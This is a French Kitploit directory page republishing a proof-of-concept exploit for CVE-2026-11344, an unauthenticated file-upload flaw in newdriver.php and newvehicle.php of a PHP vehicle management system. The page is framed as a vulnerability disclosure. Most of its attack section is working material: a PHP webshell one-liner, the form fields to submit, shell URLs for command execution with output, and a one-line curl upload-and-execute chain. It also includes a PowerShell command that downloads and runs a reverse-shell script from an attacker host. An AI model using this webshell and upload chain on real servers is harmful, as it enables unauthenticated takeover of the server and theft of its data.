Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-11344-RCE — Exploit d'exécution de code à distance non authentifié pour le système de gestion de véhicules en PHP via un téléchargement de fichier sans restriction dans newdriver.php et newvehicle.php, avec PoC et étapes de reproduction détaillées. | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-11344-rce
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubxmyronn/cve-2026-11344-rce

CVE-2026-11344-RCE

Exploit d'exécution de code à distance non authentifié pour le système de gestion de véhicules en PHP via un téléchargement de fichier sans restriction dans newdriver.php et newvehicle.php, avec PoC et étapes de reproduction détaillées.

2il y a 3 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Système de gestion de véhicules en PHP - Exécution de code à distance non authentifiée via téléchargement de fichier dans newdriver.php

Informations sur la vulnérabilité

ChampDétails
ProduitSystème de gestion de véhicules en PHP
Vendeurcode-projects.org
VersionV1.0
Type de vulnérabilitéTéléchargement de fichier sans restriction conduisant à une exécution de code à distance (CWE-434)
Fichiers concernésnewdriver.php, newvehicle.php
Paramètrephoto (POST, multipart/form-data)
Authentification requiseNon (non authentifiée)
Score CVSS10.0 Critique
Vecteur d'attaqueRéseau / à distance
Privilèges requisAucun
Interaction utilisateurAucune

Description

Le Système de gestion de véhicules en PHP V1.0 de code-projects.org est vulnérable à une exécution de code à distance non authentifiée via un téléchargement de fichier sans restriction dans newdriver.php (et identiquement dans newvehicle.php).

L'application expose un formulaire d'enregistrement "Nouveau conducteur" réservé à l'administrateur sur newdriver.php qui comprend un champ de téléchargement de photo. Cependant, le point de terminaison n'effectue aucune validation de session — tout attaquant non authentifié peut y accéder directement sans être redirigé vers la connexion. De plus, le champ de téléchargement de photo accepte tout type de fichier, y compris les fichiers PHP, sans filtrage d'extension, validation du type MIME ou inspection du contenu.

Un attaquant peut :

  1. Visiter directement newdriver.php sans aucune session ni informations d'identification
  2. Soumettre le formulaire conducteur avec un webshell PHP comme "photo"
  3. Le shell est enregistré dans le répertoire /picture/
  4. Naviguer vers le shell téléchargé et exécuter des commandes OS arbitraires sur le serveur

Cela entraîne une exécution de code à distance complète avec les privilèges du processus du serveur web.


Chaîne de vulnérabilité

root@kitploit:~
Requête HTTP non authentifiée
        ↓
newdriver.php (aucune vérification de session)
        ↓
Le champ photo accepte le fichier .php (aucune validation de type de fichier)
        ↓
Shell enregistré dans /picture/web_shell.php
        ↓
GET /picture/web_shell.php?cmd=whoami
        ↓
RCE — exécution de commande OS arbitraire

Étapes pour reproduire

Étape 1 — Confirmer l'accès non authentifié à newdriver.php

Ouvrez un navigateur frais sans session (fenêtre de navigation privée). Accédez directement au point de terminaison :

root@kitploit:~
http://CIBLE/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

Le formulaire du nouveau conducteur se charge avec succès sans vérification d'authentification et sans redirection vers la connexion.

Capture d'écran 2026-05-19 175610

Étape 2 — Préparer le webshell PHP

Créez un simple webshell d'exécution de commandes PHP :

root@kitploit:~
<?php system($_GET['cmd']); ?>

Enregistrez-le sous shell.php (ou tout nom de fichier .php).


Étape 3 — Soumettre le formulaire avec le webshell comme photo

Remplissez les champs du formulaire conducteur avec des valeurs quelconques et sélectionnez le webshell PHP comme téléchargement de photo :

root@kitploit:~
Nom du conducteur :   test
Mobile :             1234567890
Date d'embauche du conducteur : 2026-05-19
ID national :        test
Permis n° :          test
Date de fin de permis :   2026-05-30
Adresse du conducteur :    test
Photo :              shell.php   ← Webshell PHP téléchargé ici

Cliquez sur Soumettre la requête.

Capture d'écran 2026-05-19 175622
Capture d'écran 2026-05-19 175708

Étape 4 — Téléchargement du shell confirmé

L'application répond avec "Inscription terminée !" — confirmant que le shell PHP a été accepté et enregistré sans aucune validation.

Capture d'écran 2026-05-19 175718

Étape 5 — Exécuter des commandes arbitraires via le shell téléchargé

Naviguez vers le shell téléchargé dans le répertoire /picture/ et passez des commandes OS via le paramètre cmd :

root@kitploit:~
http://CIBLE/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

Le serveur exécute la commande et renvoie la sortie :

root@kitploit:~
desktop-g1i9np3\dell
Capture d'écran 2026-05-19 175759

Étape 6 — Autres exemples d'exécution de commandes

root@kitploit:~
# Lecture de fichiers sensibles
http://CIBLE/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# Liste de la racine web
http://CIBLE/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Shell inversé complet via PowerShell
http://CIBLE/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTAQUANT/shell.ps1')"

Deuxième point de terminaison concerné — newvehicle.php

La même vulnérabilité existe dans newvehicle.php. Un attaquant non authentifié peut accéder au formulaire d'ajout de nouveau véhicule, télécharger un webshell PHP via le champ photo du véhicule, et obtenir l'exécution de code à distance via la même méthode.

root@kitploit:~
http://CIBLE/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

Les deux points de terminaison partagent la même cause racine : aucune validation de session et aucune restriction de téléchargement de fichier.


PoC curl (Ligne unique)

root@kitploit:~
curl -s -X POST \
  "http://CIBLE/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php" \
  -F "dname=test" \
  -F "mobile=1234567890" \
  -F "djoiningdate=2026-05-19" \
  -F "nid=test" \
  -F "licenseno=test" \
  -F "licenseenddate=2026-05-30" \
  -F "daddress=test" \
  -F "[email protected];type=image/jpeg" \
  && echo "[+] Shell téléchargé" \
  && curl -s "http://CIBLE/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami"

Impact

  • Exécution de code à distance non authentifiée — tout attaquant anonyme sur le réseau obtient une exécution complète de commandes OS
  • Compromission totale du serveur — accès en lecture/écriture à tous les fichiers, informations d'identification, configuration de base de données
  • Aucune interaction requise — exploit entièrement automatisé en une seule requête HTTP
  • Deux points de terminaison concernés — newdriver.php et newvehicle.php tous deux vulnérables

Fichiers concernés

FichierChamp de téléchargementChemin de stockage du shell
newdriver.phpphoto/picture/
newvehicle.phpphoto/picture/

Informations sur le vendeur

  • Page d'accueil du vendeur : https://code-projects.org/vehicle-management-system-in-php-with-source-code/
  • Téléchargement : https://code-projects.org/vehicle-management-system-in-php-with-source-code/

Découvert par

Syed Imad Uddin Alvi (imad alvi)
Chercheur en sécurité indépendant

Télécharger l’outil